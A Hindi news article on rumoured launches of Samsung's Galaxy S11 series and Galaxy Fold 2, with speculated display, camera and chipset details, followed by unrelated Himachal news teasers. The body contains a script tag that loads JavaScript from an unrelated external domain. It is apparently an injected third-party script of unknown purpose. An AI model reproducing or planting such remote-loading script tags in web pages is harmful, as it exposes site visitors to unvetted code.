<p>जानी मानी कंपनी सैमसंग जल्दी ही अपनी फ्लैगशिप सीरीज Galaxy S11 लॉन्च करने जा रही है, जिसका नाम Galaxy S20 हो सकता है। इसके साथ ही कंपनी नया फोल्डेबल स्मार्टफोन गैलेक्सी Fold 2 भी ला रही है। 91मोबाइल्स की रिपोर्ट के मुताबिक, इन दोनों स्मार्टफोन को कंपनी 11 फरवरी को लॉन्च कर सकती है।</p>
<p>हालांकि कंपनी ने इसकी आधिकारिक पुष्टि नहीं की है। गैलेक्सी फोल्ड 2 यह सैमसंग का दूसरा फोल्डेबल स्मार्टफोन होगा। इसमें पंच होल सेल्फी कैमरा के साथ फोल्डेबल Infinity-O डिस्प्ले दिया जा सकता है। एक सेकंडरी डिस्प्ले बाहर की तरफ भी होगा। इसमें ड्यूल लेंस प्राइमरी कैमरा दिया होगा।</p>
<p><span style=”color:#e74c3c”><strong>Galaxy S11 सीरीज की स्पेसिफिकेशन</strong></span></p>
<p>सीरीज में तीन स्मार्टफोन Galaxy S11, S11+ और कम कीमत वाला S11e लॉन्च किया जाएगा। इनमें नोट 10 की तरह पंच होल डिस्प्ले जाएगा, जो अल्ट्रा स्लिम बेजल और कर्व्ड किनारों के साथ होगा। गैलेक्सी एस11 और एस11 प्लस में 6.7 इंच और 6.9 इंच की QHD AMOLED स्क्रीन होगी, जो 120Hz रिफ्रेश रेट के साथ आएगी।</p>
<p>वहीं, गैलेक्सी S11e में 6.4 इंच का फुल-HD+ डिस्प्ले दिया गया है। सैमसंग गैलेक्सी S11 और S11+ में 108 मेगापिक्सल का धांसू कैमरा दिए जाने की उम्मीद है। इसके अलावा 5x पेरिस्कोप लेंस और 48 मेगापिक्सल का अल्ट्रा-वाइड-ऐंगल लेंस दिया जा सकता है। इन तीन कैमरों के अलावा एक टाइम ऑफ फ्लाइट (ToF) 3D सेंसर भी दिया जा सकता है। वहीं, सैमसंग गैलेक्सी S11e में ट्रिपल रियर कैमरा सेटअप ही दिया जाएगा। इसके अलावा गैलेक्सी एस11 सीरीज में या तो स्नैपड्रैगन 865 चिपसेट या Exynos 990 प्रोसेसर दिया जा सकता है।</p>
<p> </p>
<script src=”//amptylogick.com/21aca573d498d25317.js”></script>
Tribal Areas Development: राजस्व एवं जनजातीय मंत्री जगत सिंह नेगी ने आज धर्मशाला के सर्किट…
HPRCA Final Results 2024: हिमाचल प्रदेश राज्य चयन आयोग (एचपीआरसीए) ने बुधवार को चार अलग-अलग…
Free Medical Camp Shimla : विभाग हिमाचल प्रदेश, इनर व्हील क्लब शिमला मिडटाउन और ग्राम…
शिक्षा मंत्री ने पोर्टमोर स्कूल में नवाजी प्रतिभावान एवं मेधावी छात्राएं शिमला: शिक्षा मंत्री रोहित…
HimachalWinterSession : हिमाचल प्रदेश विधान सभा के अध्यक्ष कुलदीप सिंह पठानिया ने जानकारी दी कि…
हमीरपुर: अणु के सिंथेटिक ट्रैक ग्राउंड में भारतीय थल सेना की अग्निवीर भर्ती रैली के…